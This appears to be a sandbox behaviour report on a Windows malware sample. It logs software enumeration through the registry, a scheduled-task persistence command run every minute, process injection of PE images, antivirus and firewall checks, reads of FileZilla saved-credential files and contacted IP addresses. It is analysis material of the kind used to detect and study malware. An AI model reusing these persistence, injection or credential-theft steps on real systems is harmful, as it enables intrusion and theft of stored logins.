RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000464
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: ENTERPRISE
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x00000464
key_handle: 0x00000468
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1356 CREDAT:145409
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1356 CREDAT:79875
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
wmi SELECT * FROM Win32_Processor
host 109.107.182.133
host 117.18.232.200
host 193.233.255.73
host 77.91.124.1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2908
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 253952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELÖT5eà $*¸A@@ @L›(ààðÐ/à @@.text)* `.rdataxa@b.@@.datah#°@À.rsrcààž@@.relocÐ/ð0 @B
base_address: 0x00400000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ “ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þˆZB@¶B@¶B@¶B@¶B@¶BH¶B]Bˆ^BÈTB€µB`°BC˜¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBœ¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ   þÿÿÿu˜ŠÐù¾cyåú¦eÍiL’Ś?þDVƒÐü!ŠÊû‰×6}¼™$Áªaк;ëZèy©Ä*@éã¶úæô€;Ž;¥¹Ò3[ 1œà©Üށ—Ù#,s—s3WILȽy+  qPøkú¢¼ÇmµúÂÆâs5†}àO£td€ïˆôfGj}Ɂ¬:ø÷¹â&÷c&ÀǙ@z‘ÞcÅgÓÑëGïNn3g“ ‰|ÔZز¤G> bŠ&}LºF‰w‹XÍ|[x¦D@q#4m$>äÂö>/ö8Iå¸7МGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´ˆÆ &À‡ÿ>̐<[ÏlEfMdý|îoK¡JnÜnÔϯ ïµÃFòÜxAayÛO†w(ì³Ö-ÆÆõA5«V¥0½REA“ãýñbG-¨¦¥ [Êþdã0[okû€hn¤ÛB ±±!S^¥4\Áéj8ªJÛ®!2ɘ€)C…¨”ñgÕ{@ÜMZ¶ß?…þŒ÷‘}M¯­„,ëï—õ*ž Û³OS*÷=B˜9Àc\#ŒÃ\9§ 0b;–(Ïÿ©(ÎZ﨏™ðšóe^4>ØxšúI"WÂB°%/힯¼áy?Ó( —ÖüM݋ð·7¢ —–…L{éü=ž·Ë¡gǃmPvl|S╏ DÄêq¯”o“ùŽ¾„Ì •!sœì©M7<wòÂ,-•–€<L1Ò ¿ü†/’˜w̓ð¹DPÐò°=þoʟÐðҌ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X›¥³jj&å™"Šª¯L¤E©ÊæpÏ_éKr¢•O‰Ý›TmªƒÛªuZE)J2^D{ðR¤%•£‚§õ…¼wX…˜"Æ®ë"~"ê<äPu¶ç˜„5G‚}¹‰~ó³œPr<LÌu ítuuDæ…Ôúä„fÂî4Ñ@#j-ÂÒ£ ÑɺgÍZê·í2>[Ììg€u‚„½C*PHçëhºö-€áN($q$ãeË°þm*â˜k3²Jd‰¼I?Ó#J€0ÊD’êQâZb&'ԋ ¦g¡Æ^_/|ŽB.?AVbad_exception@std@@|ŽB.?AVexception@std@@|ŽB.?AVtype_info@@
base_address: 0x0042b000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: €0€ H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042e000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELïd‚Æà 0ʬè @ à@…ÈçSV©À  H.text$È Ê `.rsrcV©ªÌ@@.reloc Àv@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: à 8
base_address: 0x0043c000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2680
process_handle: 0x00000118
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELÖT5eà $*¸A@@ @L›(ààðÐ/à @@.text)* `.rdataxa@b.@@.datah#°@À.rsrcààž@@.relocÐ/ð0 @B
base_address: 0x00400000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELïd‚Æà 0ʬè @ à@…ÈçSV©À  H.text$È Ê `.rsrcV©ªÌ@@.reloc Àv@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000118
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000514
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0
